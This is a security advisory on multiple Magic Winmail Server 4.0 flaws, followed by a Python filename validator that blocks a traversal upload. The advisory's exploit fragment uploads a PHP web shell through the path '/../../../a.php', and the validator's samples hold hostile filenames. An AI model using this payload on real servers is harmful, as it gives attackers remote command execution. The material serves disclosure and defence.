source: https://www.securityfocus.com/bid/12388/info

Magic Winmail Server is reportedly affected by multiple vulnerabilities.

There are two distinct directory traversal vulnerabilities in the Webmail interface allowing both arbitrary file downloads and uploads. There is also an HTML injection vulnerability in the Webmail interface that could lead to the theft of the administrator's session cookie.

There are several directory traversal vulnerabilities in the IMAP service commands which could permit a malicious user to read arbitrary emails, create or delete arbitrary files on the server and possibly retrieve arbitrary files from the server.

Magic Winmail Server's FTP service also reportedly fails to properly verify the IP address supplied by a user in a PORT command.

Magic Winmail Server version 4.0 (Build 1112) is reportedly affected by these issues; earlier versions may also be vulnerable.

-----------------------------31140333525651
Content-Disposition: form-data; name="userfile1"; filename="/../../../a.php"
Content-Type: application/download

<?php
system($_GET[cmd]);
?>
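
A server-side check that would refuse the filename carried in the upload request above, as an added example that is not part of the original advisory or of Winmail's own code. The upload directory, the extension allow-list and the function names are assumptions made for illustration.

```python
import posixpath
import re
from email.message import Message

UPLOAD_DIR = "/srv/webmail/uploads"             # hypothetical storage directory
ALLOWED_EXT = {".txt", ".pdf", ".png", ".jpg"}  # assumed attachment policy
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")


def part_filename(content_disposition):
    """Extract the client-supplied filename from a Content-Disposition value."""
    msg = Message()
    msg["Content-Disposition"] = content_disposition
    return msg.get_filename()


def check_upload(content_disposition, upload_dir=UPLOAD_DIR):
    """Return (True, destination) or (False, reason) for one multipart part."""
    raw = part_filename(content_disposition)
    if not raw:
        return False, "missing filename"
    # Only a bare file name is accepted: any separator, POSIX or Windows,
    # means the client is trying to choose the directory as well.
    if "/" in raw or "\\" in raw:
        return False, "path separator in filename"
    if not SAFE_NAME.fullmatch(raw) or ".." in raw:
        return False, "unexpected characters in filename"
    # Script extensions must never land in a directory the web server executes.
    if posixpath.splitext(raw)[1].lower() not in ALLOWED_EXT:
        return False, "extension not allowed"
    # Defence in depth: confirm the resolved path is still directly inside upload_dir.
    dest = posixpath.normpath(posixpath.join(upload_dir, raw))
    if posixpath.dirname(dest) != posixpath.normpath(upload_dir):
        return False, "destination escapes upload directory"
    return True, dest


# Constructed sample headers; the first is the header from the request above.
SAMPLES = [
    'form-data; name="userfile1"; filename="/../../../a.php"',
    'form-data; name="userfile1"; filename="..\\..\\notes.txt"',
    'form-data; name="userfile1"; filename="a.php"',
    'form-data; name="userfile1"; filename="report.pdf"',
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(check_upload(header), "<-", header)
```

Logging the rejected cases with the authenticated user and source address gives the mail administrator a record of traversal attempts against the upload handler.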